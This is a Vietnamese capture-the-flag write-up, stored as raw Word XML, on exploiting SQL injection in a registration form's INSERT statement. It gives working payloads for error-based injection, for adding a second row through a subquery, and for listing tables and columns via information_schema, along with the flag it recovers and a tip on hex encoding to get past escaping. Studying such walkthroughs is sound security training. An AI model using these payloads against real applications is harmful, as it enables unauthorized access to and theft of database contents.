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7967" w14:textId="7914D63E" w:rsidR="00724D47" w:rsidRDefault="00724D47">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lỗi sql injection với Insert</w:t>
      </w:r>
      <w:r w:rsidR="0039510C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> khả năng cao</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ ở phần đăng kí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB9C47" w14:textId="27529895" w:rsidR="00724D47" w:rsidRDefault="0039510C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fuzz lỗi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4551C" w14:textId="5B7BA426" w:rsidR="0039510C" w:rsidRDefault="0039510C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- payload 1=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F1A16E" w14:textId="06869E6E" w:rsidR="0039510C" w:rsidRDefault="0039510C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">username,password </w:t>
      </w:r>
      <w:r w:rsidRPr="0039510C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> char not authorized  (lọc các kí tự đặc biệt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E921D0B" w14:textId="36E30B5F" w:rsidR="0039510C" w:rsidRDefault="0039510C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">vì mình thấy email  có thể trả dữ liệu về từ ứng dụng nên </w:t>
      </w:r>
      <w:r w:rsidR="00AA7907">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sẽ tìm cách insert câu query nào đó để tìm flag.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F380FF5" w14:textId="6A87D771" w:rsidR="00AA7907" w:rsidRDefault="00AA7907">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bắt đầu tấn công nào!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78610B27" w14:textId="2366BBAC" w:rsidR="00AA7907" w:rsidRDefault="00AA7907">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Payload: ‘ or updatexml(1,concat(0x7e,(version())),0) or ‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AE2356" w14:textId="25CE824C" w:rsidR="00AA7907" w:rsidRDefault="00AA7907">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>email=Olivia ‘ or updatexml(1,concat(0x7e,(version())),0) or ‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E695581" w14:textId="77777777" w:rsidR="00A844A1" w:rsidRDefault="00A844A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAFD8DC" w14:textId="750C2AA9" w:rsidR="00AA7907" w:rsidRDefault="00AA7907">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nếu thành công nó sẽ báo lỗi  xpath syntax error ~5.5.35-0ubuntu0.12.04.1’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08594AE2" w14:textId="5B85373B" w:rsidR="00A844A1" w:rsidRDefault="00A844A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài toán thực hiện đc câu truy vấn nhưng chỉ hiển thị lỗi chung request failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC8CA3" w14:textId="0E75C190" w:rsidR="00AA7907" w:rsidRDefault="00A844A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Có lẽ không báo lỗi được. Vậy mình chỉ có thể truy suất dữ liệu qua email bằng select.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474C6594" w14:textId="568F5EA5" w:rsidR="00A844A1" w:rsidRDefault="00A844A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="552EB5A9" w14:textId="31A57B5A" w:rsidR="00A844A1" w:rsidRDefault="00AE56C2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00A844A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE56C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ms sql, oracle</w:t>
      </w:r>
      <w:r w:rsidR="00A844A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho thực hiện các câu truy vấn con trong Insert </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D180A" w14:textId="0CDFF7A0" w:rsidR="00A844A1" w:rsidRDefault="00A844A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072B6D40" w14:textId="7DBD0C2E" w:rsidR="00A844A1" w:rsidRDefault="00A844A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình chỉ còn 1 cách duy nhất là</w:t>
      </w:r>
      <w:r w:rsidR="00F91D9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thêm 2 users cùng 1 lúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588936F2" w14:textId="2F071D80" w:rsidR="00F91D9E" w:rsidRDefault="00F91D9E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Payload sẽ là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F038E44" w14:textId="705579AB" w:rsidR="00F91D9E" w:rsidRDefault="00F91D9E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F91D9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xyz@gmail.com'),('tsu','abc',(select @@version))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E035D39" w14:textId="40F191C1" w:rsidR="00F91D9E" w:rsidRDefault="00F91D9E" w:rsidP="00F91D9E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Kết quả: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F91D9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You can logged in !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="00F91D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Email : 10.3.34-MariaDB-0ubuntu0.20.04.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E716C5D" w14:textId="3056D7B2" w:rsidR="003D4DE3" w:rsidRDefault="003D4DE3" w:rsidP="00F91D9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9D8C14" w14:textId="4AE99358" w:rsidR="003D4DE3" w:rsidRDefault="003D4DE3" w:rsidP="00F91D9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tìm table payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC68615" w14:textId="74B3B667" w:rsidR="003D4DE3" w:rsidRDefault="003D4DE3" w:rsidP="00F91D9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xyz</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@gmail.com'),('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tsu1</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>','abc',(select table_name from information_schema.tables where table_schema=database() limit 0,1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6988C0" w14:textId="5169428C" w:rsidR="003D4DE3" w:rsidRDefault="003D4DE3" w:rsidP="00F91D9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2AC7CE" w14:textId="791C9AF3" w:rsidR="003D4DE3" w:rsidRDefault="003D4DE3" w:rsidP="00F91D9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tìm column trong table membres payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343E6C09" w14:textId="4054E1D9" w:rsidR="003D4DE3" w:rsidRDefault="003D4DE3" w:rsidP="00F91D9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xyz</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@gmail.com'),('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tsu2</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>','abc',(select column_name from information_schema.columns where table_name=</w:t>
      </w:r>
      <w:r w:rsidR="001F0DE9" w:rsidRPr="001F0DE9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F0DE9" w:rsidRPr="001F0DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'membres'</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> limit 0,1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6549F079" w14:textId="77777777" w:rsidR="003D4DE3" w:rsidRPr="003D4DE3" w:rsidRDefault="003D4DE3" w:rsidP="00F91D9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05916D88" w14:textId="2DE43308" w:rsidR="00F91D9E" w:rsidRDefault="00A4707A" w:rsidP="00F91D9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Bây h bài toán đã trở nên dễ dàng hơn. Mình sẽ tìm bảng ,cột </w:t>
      </w:r>
      <w:r w:rsidRPr="00A4707A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E0D1B0" w14:textId="62D8F6AC" w:rsidR="00A4707A" w:rsidRDefault="00A4707A" w:rsidP="00F91D9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034C8F06" w14:textId="1FA78841" w:rsidR="00A4707A" w:rsidRDefault="00A4707A" w:rsidP="00A470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flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A4707A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> moaZ63rVXUhlQ8tVS7Hw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7922E2E7" w14:textId="4A67A816" w:rsidR="006C3D33" w:rsidRDefault="006C3D33" w:rsidP="00A4707A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A82AB0" w14:textId="66BA3F4F" w:rsidR="006C3D33" w:rsidRDefault="006C3D33" w:rsidP="00A4707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Mở rộng thêm: vẫn select email để truy suất dữ liệu, nhưng username có thể tiêm các kí tự đặc biệt thì payload sẽ dễ dàng hơn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6D796E" w14:textId="0D07B1A3" w:rsidR="006C3D33" w:rsidRDefault="006C3D33" w:rsidP="006C3D33">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>name','pass','sign')-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B366C6A" w14:textId="49F17FA6" w:rsidR="006C3D33" w:rsidRDefault="006C3D33" w:rsidP="006C3D33">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name1’,’pass1’,(select @@version)</w:t>
      </w:r>
      <w:r w:rsidR="00991A48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121BB7E2" w14:textId="3D4F8C80" w:rsidR="006C3D33" w:rsidRDefault="001F0DE9" w:rsidP="00B20141">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00CC0660">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ếu có hàm mysqli real_escape_string() sẽ không dùng nháy đơn được</w:t>
      </w:r>
      <w:r w:rsidR="00CC0660" w:rsidRPr="00CC0660">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00CC0660">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mã hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A298F42" w14:textId="221C32CB" w:rsidR="00F91D9E" w:rsidRDefault="00F91D9E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BEA390" w14:textId="77777777" w:rsidR="00A844A1" w:rsidRDefault="00A844A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D316BB" w14:textId="77777777" w:rsidR="00A844A1" w:rsidRPr="00724D47" w:rsidRDefault="00A844A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A844A1" w:rsidRPr="00724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23"/>
    <w:rsid w:val="00136F3B"/>
    <w:rsid w:val="001F0DE9"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0039510C"/>
    <w:rsid w:val="003D4DE3"/>
    <w:rsid w:val="005C3B23"/>
    <w:rsid w:val="006C3D33"/>
    <w:rsid w:val="00724D47"/>
    <w:rsid w:val="00991A48"/>
    <w:rsid w:val="00A4707A"/>
    <w:rsid w:val="00A844A1"/>
    <w:rsid w:val="00AA7907"/>
    <w:rsid w:val="00AE56C2"/>
    <w:rsid w:val="00B20141"/>
    <w:rsid w:val="00B2521B"/>
    <w:rsid w:val="00BC1C78"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00CC0660"/>
    <w:rsid w:val="00F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BCD922"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{81B4D99F-48BA-944D-9136-B0C6862A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paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006C3D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C3D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2022-10-15T10:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-22T15:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>